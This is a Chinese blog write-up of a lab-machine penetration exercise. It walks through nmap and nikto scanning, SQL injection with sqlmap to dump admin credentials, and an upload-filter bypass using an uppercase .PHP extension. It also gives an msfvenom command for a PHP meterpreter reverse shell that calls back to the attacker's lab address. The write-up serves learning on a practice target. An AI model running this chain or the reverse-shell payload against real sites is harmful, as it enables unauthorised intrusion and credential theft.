0x00前言
本文是第一篇,重点记录对靶机80端口GET-SQL注入的渗透过程,涉及知识点:工具sqlmap、nikto及nmap的使用、文件上传、msf生成后门等。关于靶场,玩法不一,以下只是本人的一次学习过程,不喜勿喷。
0x01环境
攻击机(kali):192.168.1.107
靶机(Debian):192.168.1.103
0x02工具
nmap、nikto、sqlmap、metasploit、VMware
0x03过程
信息探测
终端下输入nmap -T4 -A -p- 192.168.1.103
探测结果为
开放端口:22(ssh) & 80(http)
Web容器信息:Apache httpd 2.2.16
系统信息:Debian
进一步使用nikto探测敏感信息
终端下输入nikto -host http://192.168.1.103
获取到php版本信息,以及/admin/login.php
后台登录页面
深入挖掘
使用浏览器访问靶机ip
打开登录页面ip/admin/login.php
尝试弱口令,无果。这时可以使用Burpsuite结合字典进行暴力破解,这里不做演示。
对网站进行浏览,发现id型展示页面,输入单引号,页面报错。
进一步使用payloadand 1=1
与and 1=2
,确认存在注入。
拿出SQLmap,简单复习一下SQLmap命令
sqlmap -u url -current-db
获取当前数据库名sqlamp -u url -D "数据库名" --tables
获取指定数据库中的所有表名sqlamp -u url -D "数据库名" -T “表名” --columns
获取指定表中的所有字段名sqlamp -u url -D "数据库名" -T “表名” -C "字段名" --dump
获取指定表的数据
通过上述命令,可以得到当前数据库photoblog表users中的字段值admin,P4ssw0rd
漏洞利用
成功登录之后在后台首页中,Add a new picture
是文件上传点,利用msfvenom制作木马文件msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444
-f raw >./Desktop/shell.php
成功在桌面生成木马文件。
在文件上传中,一般都会存在一些对上传文件的严格限制,需要根据实际情况来想办法进行绕过,然而在大多数情况下,后台管理页面的限制比较简单。在这里将上传文件后缀名改为大写即(PHP),即可成功上传。
为上传文件添加一个标题
打开msfconsole控制台对文件进行监听
开始监听,回到网页打开木马文件
成功返回,输入shell,弹出命令行
简单输入命令,发现当前用户为普通用户权限,接着需要进行提权操作,由于水平有,无法展开。
——————————————分割线——————————————
0x04总结
此次渗透首先对目标站点进行信息收集,分析信息过程中发现SQL注入获取到后台登录密码,成功登录后台后发现文件上传点,接着制作木马文件并上传,然后使用msf控制台监听文件,当文件被执行时,成功返回网站shell。
过程并不复杂,只是可以让自己对所学的知识进行简单的应用与梳理,脱离单一的靶场,初步了解渗透过程,并进一步熟悉自己掌握的知识点与技能。
作者:WebDogC
向靓仔靓女们求赞
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
admin | 50.00 | 0 | 2020-05-22 09:09:57 |
打赏我,让我更有动力~
靶机.zip File Size:0M (Download Count:2)
© 2016 - 2022 掌控者 All Rights Reserved.